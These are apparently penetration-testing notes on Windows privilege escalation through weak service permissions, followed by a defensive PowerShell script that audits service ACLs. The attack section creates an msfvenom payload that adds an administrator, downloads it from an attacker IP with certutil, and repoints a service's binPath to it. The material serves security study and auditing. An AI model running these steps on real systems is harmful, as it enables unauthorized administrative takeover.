# Insecure Service Permissions

```powershell
.\accesschk.exe /accepteula -uwcqv <user> <service>
```

Each service has an ACL which defines certain service-specific permissions.

- Some permissions are innocuous
  - `SERVICE_QUERY_CONFIG`
  - `SERVICE_QUERY_STATUS`
- Some may be useful
  - `SERVICE_STOP`
  - `SERVICE_START`
- Some are dangerous
  - `SERVICE_CHANGE_CONFIG`
  - `SERVICE_ALL_ACCESS`

# RABBIT HOLE

- If you can change a service configuration but cannot `stop/start` the service, you may not be able to escalate privileges.

```powershell
# Check which permissions a user has on a specific service
accesschk.exe -accepteula -ucqv <USER> <SERVICE>
# SERVICE_ALL_ACCESS in the output means full control over the service

# Generate the payload on local Kali
msfvenom -p windows/x64/exec CMD="net localgroup administrators <user> /add" -f exe-service -o evilsvc.exe

# Transfer the service binary
certutil.exe -urlcache -split -f http://<IP>/evilsvc.exe evilsvc.exe

# Change the service binPath (sc.exe expects a space after "binPath=")
sc.exe config <SERVICE> binPath= "C:\Users\<USER>\Desktop\evilsvc.exe"

# Restart the service, then confirm the payload executed
Restart-Service <SERVICE>
net localgroup Administrators
```
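To find this misconfiguration before someone else does, the service ACLs described above can be audited directly from their SDDL form. The script below is an added example, not part of the original notes; the helper name `Test-ServiceSddl`, the service name `ExampleSvc`, the sample descriptor and the choice of low-privileged trustees are assumptions made for illustration.

```powershell
# Added audit example: read-only, inspects service ACLs and changes nothing.
$Dangerous = [ordered]@{
    SERVICE_CHANGE_CONFIG = 0x00000002   # can rewrite binPath or the run-as account
    WRITE_DAC             = 0x00040000   # can rewrite the service ACL itself
    WRITE_OWNER           = 0x00080000   # can take ownership, then rewrite the ACL
    GENERIC_ALL           = 0x10000000   # maps to SERVICE_ALL_ACCESS
    GENERIC_WRITE         = 0x40000000   # includes SERVICE_CHANGE_CONFIG
}
# Broad, low-privileged trustees (well-known SIDs); this selection is an assumption.
$LowPriv = @{
    'S-1-1-0'      = 'Everyone'
    'S-1-5-4'      = 'INTERACTIVE'
    'S-1-5-11'     = 'Authenticated Users'
    'S-1-5-32-545' = 'BUILTIN\Users'
}

function Test-ServiceSddl {   # hypothetical helper name
    param([string]$Name, [string]$Sddl)
    $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor($Sddl)
    foreach ($ace in $sd.DiscretionaryAcl) {
        if ($ace.AceType -ne 'AccessAllowed') { continue }
        $sid = $ace.SecurityIdentifier.Value
        if (-not $LowPriv.ContainsKey($sid)) { continue }
        $hits = @($Dangerous.Keys | Where-Object { $ace.AccessMask -band $Dangerous[$_] })
        if ($hits.Count -eq 0) { continue }
        $all = [bool]($ace.AccessMask -band $Dangerous.GENERIC_ALL)
        [pscustomobject]@{
            Service   = $Name
            Trustee   = $LowPriv[$sid]
            Dangerous = $hits -join ','
            # Start/stop rights decide whether a changed config can take effect right away
            CanStart  = $all -or [bool]($ace.AccessMask -band 0x0010)   # SERVICE_START
            CanStop   = $all -or [bool]($ace.AccessMask -band 0x0020)   # SERVICE_STOP
        }
    }
}

# Constructed sample: Authenticated Users (AU) hold DC = SERVICE_CHANGE_CONFIG plus RP/WP.
$sample = 'D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCDCLCSWRPWPLOCRRC;;;AU)'
Test-ServiceSddl -Name 'ExampleSvc' -Sddl $sample

# Live sweep of the local host; "sc.exe sdshow" prints each descriptor as SDDL.
foreach ($svc in Get-Service) {
    $sddl = sc.exe sdshow $svc.Name | Where-Object { $_ -match '^D:' } | Select-Object -First 1
    if ($sddl) { Test-ServiceSddl -Name $svc.Name -Sddl $sddl }
}
```

Any row where a broad group holds `SERVICE_CHANGE_CONFIG` is the condition these notes describe; tighten the descriptor with `sc.exe sdset` so that only administrators and SYSTEM keep that right.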